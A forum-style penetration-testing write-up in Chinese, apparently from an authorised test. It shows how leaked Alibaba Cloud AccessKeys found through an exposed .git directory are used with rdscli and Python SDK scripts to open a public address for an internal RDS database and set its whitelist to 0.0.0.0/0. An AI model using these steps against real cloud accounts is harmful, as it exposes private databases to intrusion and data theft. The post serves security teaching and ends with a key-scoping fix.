前言

在某次和地方组织前期渗透侦查中(已授权), 通过/.git/获取到网站源码,查看配置文件发现该系统使用OSS进行文件存储,但是网站迟迟shell不下。通过.git对文件进行恢复,得到信息如下:
1.网站部分源码,但是审计相当耗时。
2.查看配置文件发现数据库采用阿里云RDS,且阿里云RDS为内网地址。
3.网站对文件上传采用OSS进行文件存储。

如果是你,shell拿不到,RDS仅对内,3306端口不通,SQL注入,RCE等常见漏洞又没有,改怎么办?

信息收集

配置信息如下:

ACCESSKEYID=XXXXX
ACCESSKEYSECRET=XXXXX
ENDPOINT=oss-cn-beijing.aliyuncs.com
DB_HOST=rm-xxxxx.mysql.rds.aliyuncs.com
DB_PORT=3306
DB_USER=xxxx
DB_PASSWORD=xxxxx

之前了解过,通过KEYID(非子账户),可以获取到阿里云的服务器权限,例如某些运维平台支持类似这种使用。

但是这些服务器的密码并不知道,及时知道,大部分服务器VPC对外仅开了80,443,而且异地登录会发送告警,这样的方法不可取。

利用方式

获取到MYSQL,但是通过ping,可以看到实际上是一个内网IP,其实服务器是在一个VPC里,也就是数据库只允许内网来链接,这样我们怎么办呢,可能都束手无策了吧。

主要需要分析数据,但是RDS并不允许连接。查询阿里云相关文件,发现RDS其实也可以使用ACCESSKEY来进行操作的。

通过阿里云官网,可以下载工具Rdscli https://market.aliyun.com/products/53690006/cmgj000311.html#sku=mianfeiban

查看相关文档,配置就不再次啰嗦了,文档里面都包含:

通过key查看账户下RDS相关实例:

rds DescribeDBInstances --PageSize 50

返回如下:

[root@localhost Rdscli]# rds DescribeDBInstances --PageSize 50
----------------------------------------------------------------------------------------
|                     DescribeDBInstances                                                    |
+-------------------+----------------------------------------------------------------+
|  PageNumber               |  1                                                              |
|  PageRecordCount       |  6                                                               |
|  RequestId                  |  XXXXXXXX-XXXX-4A0B-97C1-C5XXXXXXXXXX |
|  TotalRecordCount      |  6                                                                |
+-------------------+-----------------------------------------------------------------+
||                           Items                                                                  ||
|+-----------------------------------------------------------------------------------+|
|||                             DBInstance                                                    |||
||+-------------------------+-----------------------------------------------------+||
|||  ConnectionMode            |  Standard                                          |||
|||  CreateTime                   |  2020-08-14T12:46:23Z                      |||
|||  DBInstanceClass             |     rds.mysql.s3.large                         |||
|||  DBInstanceDescription   |  rr-XXXXXXXXXXXXXXXXX                     |||
|||  DBInstanceId                 |  rr-XXXXXXXXXXXXXXXXX                     |||
|||  DBInstanceNetType       |  Intranet                                            |||
|||  DBInstanceStatus           |  Running                                            |||
|||  DBInstanceStorageType  |                                                         |||
|||  DBInstanceType             |  Readonly                                          |||
|||  Engine                           |  MySQL                                              |||
|||  EngineVersion                |  8.0                                                   |||
|||  ExpireTime                    |  2020-10-14T16:00:00Z                       |||
|||  InsId                              |  1                                                      |||
|||  InstanceNetworkType     |  VPC                                                  |||
|||  LockMode                      |  Unlock                                               |||
|||  LockReason                   |                                                           |||
|||  MasterInstanceId            |  rm-XXXXXXXXXXXXXXXXX                   |||
|||  MutriORsignle                |  False                                                 |||
|||  PayType                        |  Prepaid                                             |||
|||  RegionId                        |  cn-beijing                                         |||
|||  ResourceGroupId           |  rg-XXXXXXXXXXXXXXX                         |||
|||  VSwitchId                      |  vsw-XXXXXXXXXXXXXXXXXXXXX           |||
|||  VpcCloudInstanceId       |  rr-XXXXXXXXXXXXXXXXX                     |||
|||  VpcId                            |  vpc-XXXXXXXXXXXXXXXXXXXXX           |||
|||  ZoneId                          |      cn-beijing-h                                   |||
||+--------------------------------+------------------------------------------------+||

通过工具获取实例ID,查看某个实例信息:

rds ExportDBInstance --DBInstanceId rr-XXXXXXX  --filename test

返回实例详细信息:

{
    "Items": {
        "DBInstanceAttribute": [
            {
                "Category": "HighAvailability",
                "SupportUpgradeAccountType": "No",
                "InsId": 1,
                "LockMode": "Unlock",
                "ConnectionString": "rr-xxxxxxxxxx.mysql.rds.aliyuncs.com",
                "MasterInstanceId": "rm-xxxxxxxxxxxx",
                "DBInstanceStorageType": "local_ssd",
                "DBInstanceNetType": "Intranet",
                "ReadDelayTime": "0",
                "ReadOnlyDBInstanceIds": {
                    "ReadOnlyDBInstanceId": []
                },
                "SupportCreateSuperAccount": "No",
                "MaxConnections": 2000,
                "DBInstanceClassType": "x",
                "Engine": "MySQL",
                "AvailabilityValue": "100.0%",
                "CanTempUpgrade": true,
                "VpcId": "vpc-xxxxxxxxxxx",
                "IPType": "IPv4",
                "DBMaxQuantity": 99999,
                "ConnectionMode": "Standard",
                "RegionId": "cn-beijing",
                "SlaveZones": {
                    "SlaveZone": []
                },
                "ResourceGroupId": "rg-xxxx",
                "VSwitchId": "vsw-xxxxxx",
                "InstanceNetworkType": "VPC",
                "ExpireTime": "2020-10-14T16:00:00Z",
                "ConsoleVersion": "",
                "DBInstanceType": "Readonly",
                "DBInstanceStatus": "Running",
                "ProxyType": 0,
                "DispenseMode": "ClassicDispenseMode",
                "CreationTime": "2020-08-14T12:46:23Z",
                "SecurityIPMode": "normal",
                "SuperPermissionMode": "",
                "AutoUpgradeMinorVersion": "Auto",
                "EngineVersion": "8.0",
                "CurrentKernelVersion": "rds_20200630",
                "DBInstanceDiskUsed": 67697115136,
                "IncrementSourceDBInstanceId": "rm-xxxxxxx",
                "VpcCloudInstanceId": "rr-xxxxxxx",
                "DBInstanceMemory": 8192,
                "MaxIOPS": 5000,
                "DedicatedHostGroupId": "",
                "DBInstanceStorage": 100,
                "DBInstanceDescription": "rr-xxxxxxx",
                "Extra": {
                    "DBInstanceIds": {
                        "DBInstanceId": []
                    }
                },
                "LatestKernelVersion": "rds_20200630",
                "DBInstanceId": "rr-xxxxxxxxxxxx",
                "PayType": "Prepaid",
                "AccountMaxQuantity": 99999,
                "OriginConfiguration": "",
                "MaintainTime": "18:00Z-22:00Z",
                "DBInstanceCPU": "4",
                "AccountType": "Mix",
                "DBInstanceClass": "rds.mysql.s3.large",
                "SecurityIPList": "",
                "Port": "3306",
                "ZoneId": "cn-beijing-h"
            }
        ]
    },
    "RequestId": "A1A4E351-1778-xxxx-9D57-xxxxxxx"

然后我自己在阿里云注册了一个看看RDS平台提供的功能:


注册发现,实际上RDS分为内网域名和外网域名的,默认是不开外网地址的,需要自己去申请,查看的RDS ConnectionString 很明显是一个内网的地址。

查询官方API,发现有支持此功能的API:

调用AllocateInstancePublicConnection接口申请实例的外网地址

https://help.aliyun.com/document_detail/26234.html?spm=a2c4g.11186623.6.1655.6eb83c34jOC0ON

申请外网地址代码如下:

#!/usr/bin/env python
#coding=utf-8

from aliyunsdkcore.client import AcsClient
from aliyunsdkcore.acs_exception.exceptions import ClientException
from aliyunsdkcore.acs_exception.exceptions import ServerException
from aliyunsdkrds.request.v20140815.AllocateInstancePublicConnectionRequest import AllocateInstancePublicConnectionRequest

client = AcsClient('<accessKeyId>', '<accessSecret>', 'cn-beijing')

request = AllocateInstancePublicConnectionRequest()
request.set_accept_format('json')

request.set_DBInstanceId("DBInstanceId")
request.set_ConnectionStringPrefix("public_domain")
request.set_Port("3306")

response = client.do_action_with_exception(request)
# python2:  print(response) 
print(str(response, encoding='utf-8'))

开通完外网域名之后,我们再去查询一下RDS实例域名地址:

调用DescribeDBInstanceNetInfo接口查询实例的所有连接地址信息:

#!/usr/bin/env python
#coding=utf-8

from aliyunsdkcore.client import AcsClient
from aliyunsdkcore.acs_exception.exceptions import ClientException
from aliyunsdkcore.acs_exception.exceptions import ServerException
from aliyunsdkrds.request.v20140815.DescribeDBInstanceNetInfoRequest import DescribeDBInstanceNetInfoRequest

client = AcsClient('<accessKeyId>', '<accessSecret>', 'cn-hangzhou')

request = DescribeDBInstanceNetInfoRequest()
request.set_accept_format('json')

request.set_DBInstanceId("DBInstanceId")

response = client.do_action_with_exception(request)
# python2:  print(response) 
print(str(response, encoding='utf-8'))

返回如下:

{
    "RequestId": "xxxx-xx-xx-xx-xxxxxxx",
    "DBInstanceNetInfos": {
        "DBInstanceNetInfo": [
            {
                "IPType": "Private",
                "VPCId": "vpc-xxxxxxxxx",
                "Port": "3306",
                "VSwitchId": "vsw-xxxxxx",
                "Upgradeable": "Disabled",
                "ConnectionString": "rm-xxxxxx.mysql.rds.aliyuncs.com",
                "IPAddress": "172.xx.xxx.xxx",
                "SecurityIPGroups": {
                    "securityIPGroup": []
                },
                "DBInstanceWeights": {
                    "DBInstanceWeight": []
                },
                "ConnectionStringType": "Normal"
            },
            {
                "IPType": "Public",
                "VPCId": "",
                "Port": "3306",
                "VSwitchId": "",
                "Upgradeable": "Disabled",
                "ConnectionString": "rm-xxxxxxxxxxx.mysql.rds.aliyuncs.com",
                "IPAddress": "xxx.xxx.xxx.xxx",
                "SecurityIPGroups": {
                    "securityIPGroup": []
                },
                "DBInstanceWeights": {
                    "DBInstanceWeight": []
                },
                "ConnectionStringType": "Normal"
            }
        ]
    },
    "SecurityIPMode": "normal",
    "InstanceNetworkType": "VPC"
}

这样就获取到这个RDS外网地址了,获取外网地址,发现端口不通。

测试发现我自己的也不通,看来是网络的问题了,查一下文档:

解决RDS外网无法访问:https://help.aliyun.com/knowledge_detail/96028.html#2

1、确认访问RDS实例的IP地址已添加到RDS白名单。如果未添加,请参见设置白名单,进行设置。

2、检查ECS实例的安全组。
  登录云服务器管理控制台。
  找到该实例,单击管理进入实例详情页面,在左侧导航栏,单击本实例安全组。在内网出方向安全全部规则中确认不存在对RDS实例的限制策略。
  请检查是否开启了高安全白名单模式,具体请参见高安全白名单模式。如果已开启,需确保设备公网IP地址已添加到经典网络的分组。

  注意:专有网络的分组不适用于公网。

3、查看RDS实例的状态,检查是否存在因为磁盘空间超出购买规格限制而被锁定。在实例锁定期间,应用无法对RDS数据库进行读写操作,详情请参见如何排查MySQL实例空间满后自动锁定的原因。

4、通过查看RDS实例的性能监控。
  其他性能问题请参见解决CPU、内存、空间、IOPS使用率偏高的问题。
  如是业务正常增长,建议您对实例进行配置升级。
  说明:升配过程中可能会有一次30s左右的闪断,建议用户做好连接重连机制,保证用户业务的正常运行,具体信息请参考RDS使用须知。
5、确认白名单中添加的设备公网IP地址为设备真正的出口IP地址。IP地址填写错误的原因如下:

  设备的公网IP地址不固定,可能会变动。
  IP地址查询工具或网站查询的公网IP地址不准确。关于确认设备公网IP地址的方法,请参见定位本地IP。

6、确认使用的连接地址为RDS的外网地址。

看了下我自己的:

RDS默认是127.0.0.1,拒绝所有的,所以我们需要设置一下,允许我们来链接,这样就不会因为火墙就不会导致端口不通了。

可以先查一下IP白名单:

调用DescribeDBInstanceIPArrayList接口查询RDS实例IP白名单。

https://help.aliyun.com/document_detail/26241.html?spm=a2c4g.11186623.6.1715.34013a167E3PKs

调用DescribeDBInstanceAttribute接口查询RDS实例的详细信息。

https://help.aliyun.com/document_detail/26231.html?spm=5176.10695662.1996646101.searchclickresult.5afd39f8vo1M3l

# 查询IP白名单
request = DescribeDBInstanceIPArrayListRequest()
request.set_accept_format('json')

request.set_DBInstanceId("rm-xxxxxxxxx")
response = client.do_action_with_exception(request)

然后我们再添加一下IP白名单:

调用ModifySecurityIps接口修改RDS实例IP白名单。

https://help.aliyun.com/document_detail/26242.html?spm=a2c4g.11186623.6.1717.14755667CITNGy

from aliyunsdkrds.request.v20140815.ModifySecurityIpsRequest import ModifySecurityIpsRequest


client = AcsClient('xxxxx', 'xxxxxxx', 'cn-beijing')

# 修改IP白名单

request = ModifySecurityIpsRequest()
request.set_accept_format('json')

request.set_DBInstanceId("rm-xxxxxxx")
request.set_SecurityIps("0.0.0.0/0")

response = client.do_action_with_exception(request)
# python2:  print(response)
print(str(response))

设置0.0.0.0/0所有对外就都可以链接了。

这样,我们就获得了RDS的外网域名,RDS外网访问权限。

刚才说的工具命令也提供了部分功能:

[root@localhost Rdscli]# rds help
usage: rds <operation> [options and parameters]
[rds] valid operations as follows:

CancelImport                                 | CreateAccount
CreateBackup                                 | CreateDBInstance
CreateDBInstanceForChannel                   | CreateDBInstanceforFirstPay
CreateDatabase                               | CreatePostpaidDBInstance
CreateTempDBInstance                         | CreateUploadPathForSQLServer
DeleteAccount                                | DeleteDBInstance
DeleteDatabase                               | DescribeAccounts
DescribeBackupPolicy                         | DescribeBackups
DescribeBinlogFiles                          | DescribeDBInstanceAttribute
DescribeDBInstancePerformance                | DescribeDBInstances
DescribeDatabases                            | DescribeErrorLogs
DescribeFilesForSQLServer                    | DescribeImportsForSQLServer
DescribeOptimizeAdviceByDBA                  | DescribeOptimizeAdviceOnBigTable
DescribeOptimizeAdviceOnExcessIndex          | DescribeOptimizeAdviceOnMissIndex
DescribeOptimizeAdviceOnMissPK               | DescribeOptimizeAdviceOnStorage
DescribeParameterTemplates                   | DescribeParameters
DescribeRegions                              | DescribeResourceUsage
DescribeSQLLogRecords                        | DescribeSQLLogReports
DescribeSlowLogRecords                       | DescribeSlowLogs
ExportDBInstance                             | GrantAccountPrivilege
ImportDBInstance                             | ImportDataForSQLServer
ImportDatabaseBetweenInstances               | ModifyAccountDescription
ModifyBackupPolicy                           | ModifyDBDescription
ModifyDBInstanceDescription                  | ModifyDBInstanceMaintainTime
ModifyDBInstanceSpec                         | ModifyParameter
ModifyPostpaidDBInstanceSpec                 | ModifySecurityIps
PurgeDBInstanceLog                           | ResetAccountPassword
RestartDBInstance                            | RevokeAccountPrivilege
SwitchDBInstanceNetType                      | UpgradeDBInstanceEngineVersion

例如:

rds ExportDBInstance --DBInstanceId rr-xxxxx --ModifySecurityIps 0.0.0.0/0

和Python脚本一样,即可外网链接。

同样,我们也可以开通一个安全组、修改RDS密码,重启RDS等等操作。

RDS API
https://help.aliyun.com/document_detail/182821.html?spm=a2c4g.11186623.2.10.4b1b2eb15RxpE2#doc-8073

修复建议

1.其实阿里云已经对ACCESSKEY进行分级,各种应用的子key,但是不排除扔有人直接使用ACCESSKEY,使用子key就可以避免掉这些问题。

点击收藏 | 5 关注 | 3
登录 后跟帖